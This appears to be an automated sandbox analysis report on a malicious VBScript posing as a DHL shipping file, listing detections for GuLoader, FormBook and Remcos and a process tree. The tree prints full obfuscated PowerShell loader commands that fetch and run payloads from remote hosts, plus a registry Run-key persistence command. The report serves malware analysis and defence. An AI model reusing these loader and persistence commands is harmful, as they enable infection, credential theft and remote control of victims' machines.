Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL_ES567436735845755676678877988975877.vbs

Overview

General Information

Sample name:DHL_ES567436735845755676678877988975877.vbs
Analysis ID:1431984
MD5:d0d8e78e99c4c59061e7caa5d254e8e9
SHA1:f06eff42be48b3ff12d8597fc4a155a293ed4236
SHA256:0895ad5d19828edc6d17054edb6d9eebdec60e587167716f2271bd683290aaf8
Tags:vbs
Infos:

Detection

FormBook, GuLoader, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Installs a global keyboard hook
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses cmd line tools excessively to alter registry or file data
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 1992 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_ES567436735845755676678877988975877.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 2132 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$Expirable=$Gdskes.Length-$gdnings;For($Heltemodiges=4; $Heltemodiges -lt $Expirable; $Heltemodiges+=(5)){$Mirakeldoktorerne+=$Gdskes.$Tripetalous.Invoke($Heltemodiges, $gdnings);}$Mirakeldoktorerne;}function Regulerbare($Reticularia){& ($Bestandigst) ($Reticularia);}$Planlggelserne235=Teucrium 'LeopMC,mpo Croz FreiPrpol.hrilM rgaBri /Pree5 C r. Hex0Pl n Embr( ha,W Po iHemon.lgndPreeo eksw,olisSttt ,ppNupt T Yie Red1ud.i0 Mul.Fodb0 Ska; Skr AssuWByttiOvernSe.s6.oti4El.x; Tre DepexWhis6U mo4 De,;Vsk, Alir,entv Stt:.aus1,esu2 Pic1Fagb.Cryp0 M t)W.tc D.lgGOpree npcTrickStigoSkgg/,jle2 Kry0 Me 1S lt0Stoc0Cruo1Frkk0Sahu1Skru KontFSkaniPertrUpcre Kiaf ValoNdrixLavr/Konv1Floc2Scou1Appl.,ont0Stru ';$improvers=Teucrium 'ArbeUDoubsTaleePianrTarv-,rogATwitgSclae P.lnte stKlas ';$Ovariectomize=Teucrium 'A rthSemit MastSuffpDykksNonp: Saa/Nedj/OrtoeGensu Lymrjyd.oPimepBegirNgomoF,rst Jere,agncanstt FidiSocieVir,. T sr.fproCh.r/GlasMTri,e CiktArb,hmargiSemin AaskNice1phle. TaktNonrhKdlsnOver ';$Astor=Teucrium 'Nonf> nd ';$Bestandigst=Teucrium ' PleiL.doeSp,lxSkit ';$Executry203='smittefaren';Regulerbare (Teucrium 'pugiSTecoePelstDeta-ventCFl.loDelinInddtPrepeTilbnFreet Taa Lill-Ex.ePBehea.psot Ab hPeri RakeT K,o:Gemm\AdjuNTartvBossn oce MatlTemps,obbeeu,o. FortEpipxEsthtBifr Whis-GarbV RefaTor lUndeuBoreeHyl Pier$BlysE remxRe.peBigacDionuBnsktNonsr A,kyDoci2Nedv0Term3r,ma; Men ');Regulerbare (Teucrium 'Untri Ov.fHaem Sal,(Tudbt Brue Kunsapp tZebr- alpNo sa .irt O qh Bi NoneTGerm:Ecot\Re pNdor v Ston Mone AcelToilsAgroeAfsk.Tre.tFro x DeptHjlp)Euph{QuiceAfsyxKvadiTe.rtSqui}M,le;Mi.l ');$Teariness = Teucrium 'FrereDynecScrahimp.o Gid brul%.ddea,uffp Hi pFilhdMadnaNi,at Ma,aSkum%Ha g\BeavPOv rr NoleDiscs Mani iklgDiagnPappa t,slVed 2Shir3Bu g.syndH,alla Konl Uni Fl,&Pose&Eate BylieBillcAfhohPanto Kns Ve s$tota ';Regulerbare (Teucrium 'P.lu$C.shgMa,tlAbonoEnthbAspeaUsorlK ap:Fores Timu Av,bAn ri Alinram,sOprre FrerConjtSpariUn coCronnKass= Tek(Sprnc KremDertdM.lj Felt/ HaycMerc Over$romeT ,rleLeveaScrur Pa.i MisnKalde orrsRaglsBewh)Wamu ');Regulerbare (Teucrium 'Sku,$HavigAcrolD.inoVipebLmlea banlM rk: EarTDiobaWeevaUdbyl Ly mAffao F,rdB,rti C,ag Spkh Udse.ndbdAmin= Con$ tevOCarov.atra OdorPolyiRepreOvercTordtSor.oStorm acciBe,nzSamdeBybu.Mil,srek.pr onlDhoti usttLivs(afsk$ .obA RegsBrantDivioGeinrD.mo)A.me ');$Ovariectomize=$Taalmodighed[0];Regulerbare (Teucrium ' bra$ lobg MallT.lfoT rbbAfh.aSenelS,co:Pos D IderBerbiMetof A itlinesGimbp ProrGlewoEumeb Kval Skaedispm U seSkrur PensNois=.kvaND ugePaliw Vul- HarO egabArmojFlereAldrc F.rtCy e Man SUna yN nssBkketTabeeF,rgmHakk.Dis.N Exte BritBar,.BrieWEthieFan,bEfteCSaltlManni.lideBrnenBaa,t Tem ');Regulerbare (Teucrium 'foli$ rusDPleorAmtsiKlokfovertA sesRolap Te.rCil.oUdlubCretlG,beeInfomUndeeUnd,rUnp,sGod,.SkraHIndpeAgerahided AlleTromrBvens Tep[Appl$Rri.iHoa,mDispp QuerhereoK mmvHjsleInd rAltesPaup]Conv=Trla$TromP vanlgubeaPerenRe slShrugSa vgUnqueHos,lBedss pseeConsr AutnItereslie2 Vre3Utop5 Bea ');$Republicanisms=Teucrium 'ResiDDe fr yniPosefStymt S ysShampFathr Traocardb SmdlPhote AcymOrdfe Ar,rMonosS ar.LndeDBrano H jw tilnKaoll ,igoAfpraTho dMiniFrykki upelDd.deAnal(Sult$St,cOPeriv SpaaAntarUly iScapePicncBedetRadio NonmBigaiPseuzTrkve Afg,Unbl$FlygFRet,eFri.lUnsptAlmelU.etaLet.zRefraAcourAduneDeput onetU,rue PrgrpergsNor.)lith ';$Republicanisms=$subinsertion[1]+$Republicanisms;$Feltlazaretters=$subinsertion[0];Regulerbare (Teucrium 'Symp$dhurg HonlS,lvoMultbOldfaUdmal ,ns:in.tT Hala StrkInhas,ntrtundegUn drFor nShidsKateeSpirrP.emnConveIzvo= lue(S udT AfkeIngrsSweatSoen-SynfPUd.ra LabtUsaahMowt Sang$StorF T neAtoml .oatShovlBlesaAbalz Br.aHjrerDeraeTekstLinstGymneForerPseusG.rd)Glg, ');while (!$Takstgrnserne) {Regulerbare (Teucrium 'Navn$ Exag C.al BoroB,gnbOveraUn cl B s:Th rMSkome U,sjIngreCi.ft.ptarSpors S ukNaileOleirSejrnButaeTrussSkls= Fje$Birkt AllrT.uduOp heTh,o ') ;Regulerbare $Republicanisms;Regulerbare (Teucrium 'SnydSLenit BroaAfr rBundtR.ac- MavSTy,ol iseIndfeafskp af Ento4 Exo ');Regulerbare (Teucrium 'Anal$AnargStralSemioB,isbGen aAfdrlSemi:FdreTInt.aNedrkGru.sTinst UnfgPidgrPolynSkr sLivse .rorLadenFarmeDiam= App(chanTsitueBrofsBisttLyss-DispPHoloaWhitt ClihTha, Femr$ .erFHense.ormlBed,t GanlNovaaManuzUdbeabivurUbele DjitEpiltechiePnser acsSkjo) B n ') ;Regulerbare (Teucrium 'H,rn$Blyag,arblD troS.edb Stia MinlNonf:InfoIBah nBlougFrdee Avin.looiAnnirFun,f epi DetrOmvlmHjemaunlieSkatrSkygsUnsi= ,ur$AdfrgUhenlLoq o KrlbKr,ga,eamlDelt:AcetP leplKi ka B,ad BauaVollr BozoMet mLageaCani+Chry+ .al%Arki$Sem T Fusa EmbaE.sklReasmMut.oThord .uli DatgSpith,aadeReakd Swi. Elec,andoUnswuGlucnSil.tHe,t ') ;$Ovariectomize=$Taalmodighed[$Ingenirfirmaers];}Regulerbare (Teucrium '.orf$,tedgHvall Ov,oBranbTrakaka fl Rat: DorRove aGenelsp,npTr.shUnst To,d= lan Dia,GDiskeMatitDebi-CionCEfteo brunAuditlsble Mu,n Sastalde Mas$ PerFHyoee BielSelvtclitlMimiaTelezA,tiaEns,r ,teeSobbtAurotF rleSuperMasosLysd ');Regulerbare (Teucrium 'grns$TissgFolklF buoOverbG nsa ejalS.in:Ce tM Si,eRottt NonaAntilFootbTheae AlcaKlimrTruniPurgnLitogRae Gene=Vivi re,o[ Tr SChilyDybtsPal.tBruseAfprmHuma.HutcCRetsoDonanR miv UddeSubtrApp tCh c]V lk: Kvi:etamFBillrUl.roSjusmOilsBStataL.mpsPoteeStud6Saml4ErhvS P,ltSterrIl,kiAse,nUnpagTret(Es h$GeolR GreaMultlDiskpLuerhs,ig)Ofre ');Regulerbare (Teucrium 'A pa$LedegParalexcro UnrbInveaR gslHigh:FangRPilsa WittSameiTilfoStasnVarieAfler phon ag eRo ss Tri Diso=Pene Pa [KrafSBa syBaldsStuctKon.eTrolm tab.Sam TEnt e.remx .attSupe. dklEPoinnDrejcKn.vo Ko,d ChaiCessnP.rag,ult]Im,o:Pasf:PartAforgS F,rCCapeI,oteIGl.d.RekyG .heeC phtha.dS Ru,tB.ndrPi,iiPectn .leg Uns( onu$AtomM ,oeeKon tMul,aIllulBehabPom,eLeksa.nanrPerpiUnshnForegDybf)P.ak ');Regulerbare (Teucrium 'Nod $ UdjgembrlMineoSt.mbM loaTelelkont:Ar,hFRe veSyslrD.lmrGiobiFoerm ParaDisegSkotn At e BiatPs,uiPlyic Tak=R ma$BasiR,oraatekntParcibl,noH emnFa.ie BesrantinKrepeMikssgrun. ac.sN.npu .tebSodasPirotBrnerSkreiBygenRattgDimi(Magu3S lp2Step0Gros2 Maj5Anis7 at, haa2St.g8 Pol9Omgi8Amer1Gear)Bl c ');Regulerbare $Ferrimagnetic;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4028 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Presignal23.Hal && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 2668 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$Expirable=$Gdskes.Length-$gdnings;For($Heltemodiges=4; $Heltemodiges -lt $Expirable; $Heltemodiges+=(5)){$Mirakeldoktorerne+=$Gdskes.$Tripetalous.Invoke($Heltemodiges, $gdnings);}$Mirakeldoktorerne;}function Regulerbare($Reticularia){& ($Bestandigst) ($Reticularia);}$Planlggelserne235=Teucrium 'LeopMC,mpo Croz FreiPrpol.hrilM rgaBri /Pree5 C r. Hex0Pl n Embr( ha,W Po iHemon.lgndPreeo eksw,olisSttt ,ppNupt T Yie Red1ud.i0 Mul.Fodb0 Ska; Skr AssuWByttiOvernSe.s6.oti4El.x; Tre DepexWhis6U mo4 De,;Vsk, Alir,entv Stt:.aus1,esu2 Pic1Fagb.Cryp0 M t)W.tc D.lgGOpree npcTrickStigoSkgg/,jle2 Kry0 Me 1S lt0Stoc0Cruo1Frkk0Sahu1Skru KontFSkaniPertrUpcre Kiaf ValoNdrixLavr/Konv1Floc2Scou1Appl.,ont0Stru ';$improvers=Teucrium 'ArbeUDoubsTaleePianrTarv-,rogATwitgSclae P.lnte stKlas ';$Ovariectomize=Teucrium 'A rthSemit MastSuffpDykksNonp: Saa/Nedj/OrtoeGensu Lymrjyd.oPimepBegirNgomoF,rst Jere,agncanstt FidiSocieVir,. T sr.fproCh.r/GlasMTri,e CiktArb,hmargiSemin AaskNice1phle. TaktNonrhKdlsnOver ';$Astor=Teucrium 'Nonf> nd ';$Bestandigst=Teucrium ' PleiL.doeSp,lxSkit ';$Executry203='smittefaren';Regulerbare (Teucrium 'pugiSTecoePelstDeta-ventCFl.loDelinInddtPrepeTilbnFreet Taa Lill-Ex.ePBehea.psot Ab hPeri RakeT K,o:Gemm\AdjuNTartvBossn oce MatlTemps,obbeeu,o. FortEpipxEsthtBifr Whis-GarbV RefaTor lUndeuBoreeHyl Pier$BlysE remxRe.peBigacDionuBnsktNonsr A,kyDoci2Nedv0Term3r,ma; Men ');Regulerbare (Teucrium 'Untri Ov.fHaem Sal,(Tudbt Brue Kunsapp tZebr- alpNo sa .irt O qh Bi NoneTGerm:Ecot\Re pNdor v Ston Mone AcelToilsAgroeAfsk.Tre.tFro x DeptHjlp)Euph{QuiceAfsyxKvadiTe.rtSqui}M,le;Mi.l ');$Teariness = Teucrium 'FrereDynecScrahimp.o Gid brul%.ddea,uffp Hi pFilhdMadnaNi,at Ma,aSkum%Ha g\BeavPOv rr NoleDiscs Mani iklgDiagnPappa t,slVed 2Shir3Bu g.syndH,alla Konl Uni Fl,&Pose&Eate BylieBillcAfhohPanto Kns Ve s$tota ';Regulerbare (Teucrium 'P.lu$C.shgMa,tlAbonoEnthbAspeaUsorlK ap:Fores Timu Av,bAn ri Alinram,sOprre FrerConjtSpariUn coCronnKass= Tek(Sprnc KremDertdM.lj Felt/ HaycMerc Over$romeT ,rleLeveaScrur Pa.i MisnKalde orrsRaglsBewh)Wamu ');Regulerbare (Teucrium 'Sku,$HavigAcrolD.inoVipebLmlea banlM rk: EarTDiobaWeevaUdbyl Ly mAffao F,rdB,rti C,ag Spkh Udse.ndbdAmin= Con$ tevOCarov.atra OdorPolyiRepreOvercTordtSor.oStorm acciBe,nzSamdeBybu.Mil,srek.pr onlDhoti usttLivs(afsk$ .obA RegsBrantDivioGeinrD.mo)A.me ');$Ovariectomize=$Taalmodighed[0];Regulerbare (Teucrium ' bra$ lobg MallT.lfoT rbbAfh.aSenelS,co:Pos D IderBerbiMetof A itlinesGimbp ProrGlewoEumeb Kval Skaedispm U seSkrur PensNois=.kvaND ugePaliw Vul- HarO egabArmojFlereAldrc F.rtCy e Man SUna yN nssBkketTabeeF,rgmHakk.Dis.N Exte BritBar,.BrieWEthieFan,bEfteCSaltlManni.lideBrnenBaa,t Tem ');Regulerbare (Teucrium 'foli$ rusDPleorAmtsiKlokfovertA sesRolap Te.rCil.oUdlubCretlG,beeInfomUndeeUnd,rUnp,sGod,.SkraHIndpeAgerahided AlleTromrBvens Tep[Appl$Rri.iHoa,mDispp QuerhereoK mmvHjsleInd rAltesPaup]Conv=Trla$TromP vanlgubeaPerenRe slShrugSa vgUnqueHos,lBedss pseeConsr AutnItereslie2 Vre3Utop5 Bea ');$Republicanisms=Teucrium 'ResiDDe fr yniPosefStymt S ysShampFathr Traocardb SmdlPhote AcymOrdfe Ar,rMonosS ar.LndeDBrano H jw tilnKaoll ,igoAfpraTho dMiniFrykki upelDd.deAnal(Sult$St,cOPeriv SpaaAntarUly iScapePicncBedetRadio NonmBigaiPseuzTrkve Afg,Unbl$FlygFRet,eFri.lUnsptAlmelU.etaLet.zRefraAcourAduneDeput onetU,rue PrgrpergsNor.)lith ';$Republicanisms=$subinsertion[1]+$Republicanisms;$Feltlazaretters=$subinsertion[0];Regulerbare (Teucrium 'Symp$dhurg HonlS,lvoMultbOldfaUdmal ,ns:in.tT Hala StrkInhas,ntrtundegUn drFor nShidsKateeSpirrP.emnConveIzvo= lue(S udT AfkeIngrsSweatSoen-SynfPUd.ra LabtUsaahMowt Sang$StorF T neAtoml .oatShovlBlesaAbalz Br.aHjrerDeraeTekstLinstGymneForerPseusG.rd)Glg, ');while (!$Takstgrnserne) {Regulerbare (Teucrium 'Navn$ Exag C.al BoroB,gnbOveraUn cl B s:Th rMSkome U,sjIngreCi.ft.ptarSpors S ukNaileOleirSejrnButaeTrussSkls= Fje$Birkt AllrT.uduOp heTh,o ') ;Regulerbare $Republicanisms;Regulerbare (Teucrium 'SnydSLenit BroaAfr rBundtR.ac- MavSTy,ol iseIndfeafskp af Ento4 Exo ');Regulerbare (Teucrium 'Anal$AnargStralSemioB,isbGen aAfdrlSemi:FdreTInt.aNedrkGru.sTinst UnfgPidgrPolynSkr sLivse .rorLadenFarmeDiam= App(chanTsitueBrofsBisttLyss-DispPHoloaWhitt ClihTha, Femr$ .erFHense.ormlBed,t GanlNovaaManuzUdbeabivurUbele DjitEpiltechiePnser acsSkjo) B n ') ;Regulerbare (Teucrium 'H,rn$Blyag,arblD troS.edb Stia MinlNonf:InfoIBah nBlougFrdee Avin.looiAnnirFun,f epi DetrOmvlmHjemaunlieSkatrSkygsUnsi= ,ur$AdfrgUhenlLoq o KrlbKr,ga,eamlDelt:AcetP leplKi ka B,ad BauaVollr BozoMet mLageaCani+Chry+ .al%Arki$Sem T Fusa EmbaE.sklReasmMut.oThord .uli DatgSpith,aadeReakd Swi. Elec,andoUnswuGlucnSil.tHe,t ') ;$Ovariectomize=$Taalmodighed[$Ingenirfirmaers];}Regulerbare (Teucrium '.orf$,tedgHvall Ov,oBranbTrakaka fl Rat: DorRove aGenelsp,npTr.shUnst To,d= lan Dia,GDiskeMatitDebi-CionCEfteo brunAuditlsble Mu,n Sastalde Mas$ PerFHyoee BielSelvtclitlMimiaTelezA,tiaEns,r ,teeSobbtAurotF rleSuperMasosLysd ');Regulerbare (Teucrium 'grns$TissgFolklF buoOverbG nsa ejalS.in:Ce tM Si,eRottt NonaAntilFootbTheae AlcaKlimrTruniPurgnLitogRae Gene=Vivi re,o[ Tr SChilyDybtsPal.tBruseAfprmHuma.HutcCRetsoDonanR miv UddeSubtrApp tCh c]V lk: Kvi:etamFBillrUl.roSjusmOilsBStataL.mpsPoteeStud6Saml4ErhvS P,ltSterrIl,kiAse,nUnpagTret(Es h$GeolR GreaMultlDiskpLuerhs,ig)Ofre ');Regulerbare (Teucrium 'A pa$LedegParalexcro UnrbInveaR gslHigh:FangRPilsa WittSameiTilfoStasnVarieAfler phon ag eRo ss Tri Diso=Pene Pa [KrafSBa syBaldsStuctKon.eTrolm tab.Sam TEnt e.remx .attSupe. dklEPoinnDrejcKn.vo Ko,d ChaiCessnP.rag,ult]Im,o:Pasf:PartAforgS F,rCCapeI,oteIGl.d.RekyG .heeC phtha.dS Ru,tB.ndrPi,iiPectn .leg Uns( onu$AtomM ,oeeKon tMul,aIllulBehabPom,eLeksa.nanrPerpiUnshnForegDybf)P.ak ');Regulerbare (Teucrium 'Nod $ UdjgembrlMineoSt.mbM loaTelelkont:Ar,hFRe veSyslrD.lmrGiobiFoerm ParaDisegSkotn At e BiatPs,uiPlyic Tak=R ma$BasiR,oraatekntParcibl,noH emnFa.ie BesrantinKrepeMikssgrun. ac.sN.npu .tebSodasPirotBrnerSkreiBygenRattgDimi(Magu3S lp2Step0Gros2 Maj5Anis7 at, haa2St.g8 Pol9Omgi8Amer1Gear)Bl c ');Regulerbare $Ferrimagnetic;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 2944 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Presignal23.Hal && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 1496 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • cmd.exe (PID: 2140 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 3788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 6548 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • wscript.exe (PID: 6984 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Sydstligstes.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
            • powershell.exe (PID: 5804 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Raakolde = 1;$Fornrmet='S';$Fornrmet+='ubstrin';$Fornrmet+='g';Function Circumflexes($Cumulet){$Semimonarchically=$Cumulet.Length-$Raakolde;For($Habitually=4; $Habitually -lt $Semimonarchically; $Habitually+=(5)){$Wenzel+=$Cumulet.$Fornrmet.Invoke($Habitually, $Raakolde);}$Wenzel;}function Jettes($trendy){&($Indbagendes) ($trendy);}$Simultansceners=Circumflexes 'Ark,MMervoAn.czVampiT lel ElelBlreaSy.o/Jagt5 ve.Seac0T,sp Ryg.( KrmW.urdiRiitn s rdPi do.orhwAllosHjem G,oN PraT.oli ,eg1Inte0Remb.Spra0Anal;Duct Ret.WVagtiAtomnskyt6Aced4 Non;Falc F.glx.art6Pseu4.icr;Rovf MilrGramvNert:Nara1H,lg2Rive1Unde.Sopr0Pres)Vrd. P.slG,ndeeCubacSkinkTilloOffp/Slib2Pl r0Ned,1Appe0Onyc0Ven,1 enn0Trfi1 Bre V deFMickiKonsr traeA.trf dr oQrscxSamm/Moor1Hard2 ,or1Werf.,yde0.uto ';$Optrins45=Circumflexes 'tidsUI.prsP,yceSkabrover-StemAUkeng,ondeLivinE,tetHera ';$Levemulighed=Circumflexes 'B,slhG,ldt MentInflpKo,m:Conf/Ke,d/,ndf8Ago.7 bal.Pige1Cann2.ejl1 Fer.,rol1Diet0Nona5 Ske..ata1 Bl,6Ex.e3Kast/SrmrD Kile Ne.tSkreeIndmn rot MyxiBe aoKonknConse BoynDesi.s,rtj.attaDissv toda Non ';$Cose=Circumflexes 'Skor>Undi ';$Indbagendes=Circumflexes 'Dm,niMilieSelsx Bar ';$Nutritionary133='Paakldtes';Jettes (Circumflexes 'Ch dSSonaeAutotAlda-UnmyC.rocoValgn,annt Ende.enin S.dtO er Can- NobP ixta Fo.tBindhMe.k VrdiTSorg:Baga\Pt.rFbureoPot,rOutshTot,j S.iuretrlillesFletbTikmr GabeSmaamRadesAmoreT ivs.lbn.MargtAircx iltSaut Pote-La dVKinea Boll SafuEncaeDiap ,npr$CausN IlluDiglt Tndr,nbriKon,tBra,iUn.koDegenSpydaTricr egnyKrim1K.ip3Erem3L.eb; Bri ');Jettes (Circumflexes 'Tr.ni.inkfHoo. Skil(Indit AroeUndesuafmtEpit-DrukpFareaSkibtDuplhAfid silTRuck:None\Sla,F Sgeo Bu,rTec.hobsejAp.puQuanlBloks ostbs,mmrP osePal.mSocisCudbe Pics A,m.Te rtBre,xDigit ,fl),era{Giske andxRe aiNacrtCham}Pg.e;Ergo ');$Ballplayers248 = Circumflexes ' nkeSpikc Udmhsiego lgu Eksp%S,paaBagepTaktpOtopdElemaimpetarchaTran%She,\ParaATrignKolltHo,eiangulSkrmltr.ke Anpa JounChr,1Umed4 C.s4Sur...lumGVilkrBel.oJe n Ef e&sa,m&D.ge UpfieBil cUnnah KreoN,np Ci.i$ Kri ';Jettes (Circumflexes 'Real$,eclgFalsl.nifoAxi,bWolfaAfselCoin:SgesFScrso vrmrBrbaaBronn kkek Tabr,obbiGre nResig Kr,s oltpOveruCafenOverksol t KureBagnt Bits .ps=Abd.(dab,cSju.mEl md ,in Ferr/Calcc Ch, F rs$BedrBPi radra,lSna lurfjpMarklDialaIrr.yIndve R,trSeiss Puz2Duct4Ba.h8Phot)Dri ');Jettes (Circumflexes 'Ha.l$SlvsgEftel nfoSt,ibM.inaTabplTick: SpeA MoklEctovSubte UneoRegilSndaiErodtDispemdresTol =Lnn,$MyndLRaskeSkilv W.veForbmStrauf rflGauki.azigYemehPreee TradDole.RegesEft.p Ci.lIndaiVar.tVa,e(Sume$EnheCFormo.dves Pree G.n)Spil ');$Levemulighed=$Alveolites[0];Jettes (Circumflexes 'Anbr$.addgU.trl ,taoim ebTa.ba.alclB,nk:BestS.orkk GibeM,aspJotatS yti ,uncCoa,=partNDagbe KecwUrok-,lafOwainb ejljSkrseUns.curo.t.onc B anSSvalyVands igmtM.sceJug mSoap.FascNPhyleFre,t iga..oncWHetee Cikb istCDeralkin iSporeMetanMapptF er ');Jettes (Circumflexes ' Hic$DefiSGoo k.orteTranpNulvtgummi,nfrcO,dy. skrHUn ieAa aa PerdSp,reBillrJordsB.am[Frug$FormOSuttpFidutLnsird nkiGiggnBlansfeer4I da5Over]Korv=Reig$di,kS StuiUhelmInseuKnsklLeattu,spadur.nQuadsEmulc CykeSlavn H pe Regr fkosUdry ');$Isoln=Circumflexes ' .meS,ondkSka eSemipUndetSpgeiP,nccAver.Mer.DAnomoP stw.deanthrolov roFarta N,ddSt dFAssui Krel Bd,eUntr(Ove,$OmsoLScarePerevDyreeflyvmJi buStorl Kkki PergWarnh ikleFuldd .dr,Gfor$.aktHEpisvPriniHarerSexuv PholBll e Pros ya)un.h ';$Isoln=$Forankringspunktets[1]+$Isoln;$Hvirvles=$Forankringspunktets[0];Jettes (Circumflexes ' Sh $Eft gPounlFromoUfatb iea S,ilUnc,:CasuPFlanuStjdnVaskc B.otRighuU.tis Sor=hu,t(SculTCorreOutks Th,tReal-SyttP avaRingt Tr hThru Modt$GlauH.elfvForkiTensrr.prvMowelLaise Pe.s eat) Tyn ');while (!$Punctus) {Jettes (Circumflexes 'Unpr$B.blgPolylPorto Ba.bKampaAzidlPaal:MonomUdslaharorCanacBdeaeBr.nsSupecSubreSretn ThocTor.eDat,=Macr$.xtrtOverrBobbuNonseHnge ') ;Jettes $Isoln;Jettes (Circumflexes ' MinSKu.ttPensaOverr ynetMatr-PromSMin lThimeCosteSkndpSkva npa4,esp ');Jettes (Circumflexes 'Ufor$ SilgKat.lLiquochokbBrnda Trol kur:SnowPPostuAndenAnlgcAf.utSk.duAffesOver=Bram( afgT DrieRemisOwentFelt- UdfPBlomaD,fftRe,vhNd.i Frad$ ollH Tipv ProiHyd rUp.av ForlBefoeProjsHjes)Sewm ') ;Jettes (Circumflexes 'Coin$ OrngWaftlB.reo veb Scoa AttlQuis:.axiVDekroAggrl Spol s.ae ParyJingbResuaAlcolDamplVo,dsBlr,=Skub$ProtgRufflserooR.cibLe ea MenlAr,o: O.eMEmmeaTommgForriUdbrkK.sse,kkor.trinAksge aars.jem+Inst+ T l%Prom$BecrAVarsl UdtvShoreHvo,oLeavlTrieiCrybtAcceeTveds Jvn.LeptcMetaoRegou eren,amnt .is ') ;$Levemulighed=$Alveolites[$Volleyballs];}Jettes (Circumflexes 'Anon$ LiggAsenlUnchoOph.bPalaa utilSubm:TndeHCyatoConcvNonoeDelidApoksBruntStemrHermuCou,kringtr thuRingrUheleSrstrBiocnSla.e,refsTil, D.st=Matr Di,GAmate galtBesk-DissCNon.oCournPartt FoueUf.dnM,wstCamb 